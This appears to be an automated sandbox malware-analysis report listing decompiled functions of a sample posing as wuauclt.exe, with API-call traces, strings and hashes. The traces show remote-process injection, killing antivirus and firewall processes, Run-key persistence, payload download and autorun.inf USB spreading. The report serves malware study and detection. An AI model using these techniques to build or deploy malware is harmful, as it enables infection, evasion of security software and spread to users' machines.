                                                                            • LoadLibraryA.KERNEL32(Psapi.dll), ref: 02311EC4
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02311ED3
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02311EE1
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02311EEF
                                                                            • OpenProcess.KERNEL32(0000042A,00000000,00000000), ref: 02311FC0
                                                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000084,00000000,00000000,?,?), ref: 02312047
                                                                            • GetInputState.USER32 ref: 02312055
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0231205E
                                                                            • PostThreadMessageA.USER32(00000000), ref: 02312065
                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02312075
                                                                            • ReadProcessMemory.KERNEL32(?,?,023122C8,00000032,?), ref: 0231208C
                                                                            • VirtualAllocEx.KERNEL32(?,00000000,311C5C2D,00001000,00000040), ref: 023120BF
                                                                            • WriteProcessMemory.KERNEL32(?,00000000,?,311C5C2D,?), ref: 023120ED
                                                                            • VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 023120FD
                                                                            • WriteProcessMemory.KERNEL32(?,00000001,?,00000004,?), ref: 02312158
                                                                            • WriteProcessMemory.KERNEL32(?,-00000006,?,00000004,?), ref: 0231216B
                                                                            • WriteProcessMemory.KERNEL32(?,02311C1B,02312358,00000004,?), ref: 02312189
                                                                            • VirtualProtectEx.KERNEL32(?,?,00000032,00000040,?), ref: 023121B7
                                                                            • WriteProcessMemory.KERNEL32(?,?,?,00000032,?), ref: 023121D0
                                                                            • WriteProcessMemory.KERNEL32(?,?,0231235C,00000004,?), ref: 023121F0
                                                                            • ResumeThread.KERNEL32(?), ref: 023121FA
                                                                            • GetInputState.USER32 ref: 02312200
                                                                            • GetCurrentThreadId.KERNEL32 ref: 02312209
                                                                            • PostThreadMessageA.USER32(00000000), ref: 02312210
                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02312220
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02312236
                                                                            • CreateRemoteThread.KERNEL32(?,00000000,00000000,02311C1A,00000000,00000000,?), ref: 02312252
                                                                            • SetThreadPriority.KERNEL32(00000000,00000002), ref: 02312268
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02312271
                                                                            • VirtualFreeEx.KERNEL32(?,02311C0A,00000000,00008000), ref: 02312283
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02312290
                                                                            • CloseHandle.KERNEL32(?), ref: 02312295
                                                                            • CloseHandle.KERNEL32(?), ref: 0231229A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000003.2180435124.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: true
                                                                            • Associated: 0000002A.00000003.2171747503.0000000002310000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_3_2310000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$Process$MemoryThread$Write$LibraryLoadMessageVirtual$CloseHandle$CreateCurrentFreeInputObjectPostSingleStateWait$AllocOpenPriorityProtectReadRemoteResumeVersion
                                                                            • String ID: 2$IEXPLORE.EXE$Kernel32.dll$Psapi.dll$Urlmon.dll$Wininet.dll$_Y
                                                                            • API String ID: 742397454-3370953745
                                                                            • Opcode ID: ffe0814801545598d6a796352840efc2063bf2a0fe0169612c762953d40305a9
                                                                            • Instruction ID: a695b7dba6a94ac0ca65fa43ccaf07c7f710757af0986b75b797e07ed4d9ee69
                                                                            • Opcode Fuzzy Hash: ffe0814801545598d6a796352840efc2063bf2a0fe0169612c762953d40305a9
                                                                            • Instruction Fuzzy Hash: 871209B5D40258AFDB159FA5DC44EEFBFBDFB48750F00491AEA48A2210D7318A61DF60
                                                                            Function 0040558C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindWindowA.USER32(IEFrame,00000000), ref: 0040559A
                                                                            • EnumChildWindows.USER32(?,Function_000053F8), ref: 004055AE
                                                                            • FindWindowExA.USER32(00000000,?,IEFrame,00000000), ref: 004055BD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: FindWindow$ChildEnumWindows
                                                                            • String ID: IEFrame
                                                                            • API String ID: 761535084-2708574431
                                                                            • Opcode ID: 4df47bb9bfd133a365dc7414d364b90dfc5f5430ccf501699f06f4521e5fb497
                                                                            • Instruction ID: 9fa48d5c06d7a0159174ceea0a4e608dfe463db216e6cfd13e307e5669a667bf
                                                                            • Opcode Fuzzy Hash: 4df47bb9bfd133a365dc7414d364b90dfc5f5430ccf501699f06f4521e5fb497
                                                                            • Instruction Fuzzy Hash: CDE0E2E1380B0232E62020E60C83F2B20498B64B68F20103ABE14B82CAFDFDA814152E
                                                                            Function 00404C8C Relevance: 6.0, APIs: 4, Instructions: 37timefileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileA.KERNEL32(00000000,?,?,?,00404CFE,?,00407C46,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404CA7
                                                                            • FindClose.KERNEL32(00000000,00000000,?,?,?,00404CFE,?,00407C46,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404CB2
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00404CCB
                                                                            • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 00404CDC
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: FileTime$Find$CloseDateFirstLocal
                                                                            • String ID:
                                                                            • API String ID: 2659516521-0
                                                                            • Opcode ID: e19ef94f2e6e2a907a38945001cbfa430e33e270dcde4c1a02f6c12d7a16949f
                                                                            • Instruction ID: 5eb690258a486c73d36cab68f814cc2b6737afb4a969db669cbaf41a67b5cd0e
                                                                            • Opcode Fuzzy Hash: e19ef94f2e6e2a907a38945001cbfa430e33e270dcde4c1a02f6c12d7a16949f
                                                                            • Instruction Fuzzy Hash: F0F0A4B5D0520C66CB10EAE68D859CF73AC5F45314F5006F7B615F21D1E738DB444754
                                                                            Function 00404A98 Relevance: 3.0, APIs: 2, Instructions: 24nativewindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostQuitMessage.USER32(00000000), ref: 00404AAA
                                                                            • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00404ABE
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: MessageNtdllPostProc_QuitWindow
                                                                            • String ID:
                                                                            • API String ID: 4264772764-0
                                                                            • Opcode ID: 09b9339f5cc573032236493d8dceb665ca5f08ba7ea5b0146747c0737a21e41f
                                                                            • Instruction ID: 6d0fe3e5f2a624f7a99d633fdd4a9b0fdd2fbeae9b853d00227d1a052b52fcf1
                                                                            • Opcode Fuzzy Hash: 09b9339f5cc573032236493d8dceb665ca5f08ba7ea5b0146747c0737a21e41f
                                                                            • Instruction Fuzzy Hash: 68E046B13442086BCB00DEAA8CC1E5BB3DDABC8214F50C12ABA08D7285D574E8018AA9
                                                                            Function 00406F74 Relevance: 68.5, APIs: 33, Strings: 6, Instructions: 237windowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 00406FA4
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 00406FB1
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 00406FBC
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 00406FE8
                                                                            • GetDesktopWindow.USER32 ref: 00406FF1
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 00406FFE
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 00407009
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 00407035
                                                                            • GetDesktopWindow.USER32 ref: 0040703E
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 0040704B
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 00407056
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 00407082
                                                                            • GetDesktopWindow.USER32 ref: 0040708B
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 00407098
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 004070A3
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 004070CF
                                                                            • GetDesktopWindow.USER32 ref: 004070D8
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 004070E5
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 004070F0
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 0040711C
                                                                            • GetDesktopWindow.USER32 ref: 00407125
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 00407132
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 0040713D
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 00407169
                                                                            • FindWindowA.USER32(TKillqqvir,00000000), ref: 00407179
                                                                            • FindWindowA.USER32(TKillqqvir,00000000), ref: 0040718F
                                                                            • PostMessageA.USER32(00000000,TKillqqvir,00000000,00000012), ref: 00407195
                                                                            • FindWindowA.USER32(TKqqviru,00000000), ref: 004071A1
                                                                            • FindWindowA.USER32(TKqqviru,00000000), ref: 004071B7
                                                                            • PostMessageA.USER32(00000000,TKqqviru,00000000,00000012), ref: 004071BD
                                                                            • FindWindowA.USER32(TApplication,qqav), ref: 004071CC
                                                                            • FindWindowA.USER32(TApplication,qqav), ref: 004071E5
                                                                            • PostMessageA.USER32(00000000,TApplication,qqav,00000012), ref: 004071EB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Find$MessagePost$DesktopText
                                                                            • String ID: QQAV$QQKav$TApplication$TKillqqvir$TKqqviru$qqav
                                                                            • API String ID: 2345741875-3628034782
                                                                            • Opcode ID: 60e916dd5e1458509275c67092bed66e14a56065459e347c25ee774d8020755b
                                                                            • Instruction ID: f35ba248066b91e113d1cf3b3e48b889a6c1fe840748cfa81e74fa6914067d70
                                                                            • Opcode Fuzzy Hash: 60e916dd5e1458509275c67092bed66e14a56065459e347c25ee774d8020755b
                                                                            • Instruction Fuzzy Hash: 7C610DB0B8434466E620B6B24D83F5E656D9F94B08F20617FBF00BA2C3D9BCAD11456D
                                                                            Function 0040854E Relevance: 49.2, APIs: 7, Strings: 21, Instructions: 188threadfileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DeleteFileA.KERNEL32(00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 00408625
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 0040867F
                                                                              • Part of subcall function 00404B70: RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 00404BAB
                                                                              • Part of subcall function 00404B70: RegDeleteValueA.ADVAPI32(?,00000000,00000000,00404BF0), ref: 00404BC7
                                                                              • Part of subcall function 00404B70: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00404BF0), ref: 00404BD0
                                                                              • Part of subcall function 00404D98: GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00408763,00000000,00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 00404DBD
                                                                              • Part of subcall function 00408494: InternetGetConnectedState.WININET(?,00000000), ref: 004084A3
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007BEC,00000000,00000000,0040A778), ref: 00408780
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000072AC,00000000,00000000,0040A77C), ref: 00408798
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007DD0,00000000,00000000,0040A780), ref: 004087B0
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007F54,00000000,00000000,0040A784), ref: 004087C8
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000084B8,00000000,00000000,0040A788), ref: 004087E0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CreateThread$DeleteFile$CloseConnectedInternetModuleNameOpenStateValue
                                                                            • String ID: ASSISTSHELLMUTEX$AntiTrojan3721$JQbkgu$JQbkgu(f|`$KAVPersonal50$KingsoftAntivirusScanProgram7Mutex$KvMonXP$Microsoft$RavTask$SKYNET_PERSONAL_FIREWALL$Slhkk}r$Software\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run$WSEKK]R-A]C$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$YLive.exe$`tn{*q~w$kakatool.dll$l}+2$wuauclt.exe$yassistse
                                                                            • API String ID: 1871698649-3763132952
                                                                            • Opcode ID: c7e4ef307231b5727f18d737f42bfdf77d138b8471ae12336459b4f4e1b329ba
                                                                            • Instruction ID: 6a7de7b5178300d5e0790259bd21792f98359187be932f6565a32f3e00f96a55
                                                                            • Opcode Fuzzy Hash: c7e4ef307231b5727f18d737f42bfdf77d138b8471ae12336459b4f4e1b329ba
                                                                            • Instruction Fuzzy Hash: 175143B07442056BD700F7A69D03FAE76699F84708F60853FB6547B2D2CEBCAD0046AD
                                                                            Function 00408550 Relevance: 49.2, APIs: 7, Strings: 21, Instructions: 187threadfileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DeleteFileA.KERNEL32(00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 00408625
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 0040867F
                                                                              • Part of subcall function 00404B70: RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 00404BAB
                                                                              • Part of subcall function 00404B70: RegDeleteValueA.ADVAPI32(?,00000000,00000000,00404BF0), ref: 00404BC7
                                                                              • Part of subcall function 00404B70: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00404BF0), ref: 00404BD0
                                                                              • Part of subcall function 00404D98: GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00408763,00000000,00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 00404DBD
                                                                              • Part of subcall function 00408494: InternetGetConnectedState.WININET(?,00000000), ref: 004084A3
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007BEC,00000000,00000000,0040A778), ref: 00408780
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000072AC,00000000,00000000,0040A77C), ref: 00408798
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007DD0,00000000,00000000,0040A780), ref: 004087B0
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007F54,00000000,00000000,0040A784), ref: 004087C8
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000084B8,00000000,00000000,0040A788), ref: 004087E0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CreateThread$DeleteFile$CloseConnectedInternetModuleNameOpenStateValue
                                                                            • String ID: ASSISTSHELLMUTEX$AntiTrojan3721$JQbkgu$JQbkgu(f|`$KAVPersonal50$KingsoftAntivirusScanProgram7Mutex$KvMonXP$Microsoft$RavTask$SKYNET_PERSONAL_FIREWALL$Slhkk}r$Software\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run$WSEKK]R-A]C$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$YLive.exe$`tn{*q~w$kakatool.dll$l}+2$wuauclt.exe$yassistse
                                                                            • API String ID: 1871698649-3763132952
                                                                            • Opcode ID: b86f05e999e844c495e0e50c26fabb8c117fd4a697973720332456d8ac770a48
                                                                            • Instruction ID: 3c3994bb7e487e018b31e22462f638a3ed2aa8583c797724152dc9debaa7126f
                                                                            • Opcode Fuzzy Hash: b86f05e999e844c495e0e50c26fabb8c117fd4a697973720332456d8ac770a48
                                                                            • Instruction Fuzzy Hash: BA5141B07442056BD700FBA69D03FAE76699F84708F60853FB6547B2D2CEBCAD0046AD
                                                                            Function 004058D0 Relevance: 33.5, APIs: 10, Strings: 9, Instructions: 219filesleepnetworkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405970
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00405C8B,?,00000000,00000000,?,00406702,00406725,?,00000000,?,00407FF7,00000001,00000000), ref: 00405982
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 004059A7
                                                                            • Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405C8B,?,00000000,00000000,?,00406702,00406725), ref: 004059B5
                                                                            • GetEnvironmentVariableA.KERNEL32(ProgramFiles,?,00000100,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405C8B,?,00000000,00000000), ref: 00405A2E
                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000010,?,ProgramFiles,?,00000100,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405C8B), ref: 00405A3B
                                                                            • SHGetPathFromIDList.SHELL32(?,?), ref: 00405A4B
                                                                              • Part of subcall function 00404D04: GetVersionExA.KERNEL32(?,?,004072CF,00000000,0040775D,?,00000003,00000000,00000000), ref: 00404D15
                                                                            • Sleep.KERNEL32(000003E8,00000000,00000010,?,ProgramFiles,?,00000100,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405C8B), ref: 00405C3C
                                                                            • DeleteFileA.KERNEL32(00000000,000003E8,00000000,00000010,?,ProgramFiles,?,00000100,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00405C4E
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405C60
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$File$CacheEntrySleep$DownloadEnvironmentFolderFromListLocationPathSpecialVariableVersion
                                                                            • String ID: MfimBljf9$MfimMkbf|86$ProgramFiles$XLhwawhfp%C{tiiqaw(vvi$XLhwawhfp%C{tiiqawZja}vokwc-a}c$_LhwawhfpVnlvqevpX$llc-p}r$lqrs>*)nwb(wimg`o`t-gjk,m`(w|q$qwj>
                                                                            • API String ID: 1888836333-1695214238
                                                                            • Opcode ID: e3da093745fd22060b98c53e03d59326e57067ec717ce08f2d96f7b452999480
                                                                            • Instruction ID: a5c779206b19b53d33bbc18893a0be02a82dcc92b5c72ba9f95bed763f7d3347
                                                                            • Opcode Fuzzy Hash: e3da093745fd22060b98c53e03d59326e57067ec717ce08f2d96f7b452999480
                                                                            • Instruction Fuzzy Hash: D09103746012099BD710FB65DD4AA8E77B8EF84308F1040BBB504BB2E3DA78AE418F5D
                                                                            Function 00406354 Relevance: 30.0, APIs: 11, Strings: 6, Instructions: 211fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetDriveTypeA.KERNEL32(00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 004063BF
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 00406420
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 00406440
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 00406468
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000080,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 0040648B
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000080,00000000,00000080,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 004064A9
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 004064C7
                                                                            • GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000,0040664A), ref: 004064EB
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0040651C
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000), ref: 004065F8
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080), ref: 00406618
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: File$Attributes$Delete$CopyDriveModuleNameType
                                                                            • String ID: [AutoRun]$\autorun.inf$\sxs.exe$open=sxs.exe$shell\Auto\command=sxs.exe$shellexecute=sxs.exe
                                                                            • API String ID: 4177304369-1696378998
                                                                            • Opcode ID: 299983fc2644e268d4eb946287a73f5fb260f3d8290e2a63062f545d2966dc6c
                                                                            • Instruction ID: d6a08cfd8c4e4eb5d113470b4235742803baeb825baf014acef4385ded9ab805
                                                                            • Opcode Fuzzy Hash: 299983fc2644e268d4eb946287a73f5fb260f3d8290e2a63062f545d2966dc6c
                                                                            • Instruction Fuzzy Hash: 31715370610108ABCB00FBA6C952A8E77B9AF84709F50853BB501B72D2CB7DAF11875D
                                                                            Function 00405FB0 Relevance: 30.0, APIs: 11, Strings: 6, Instructions: 211fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetDriveTypeA.KERNEL32(00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 0040601B
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 0040607C
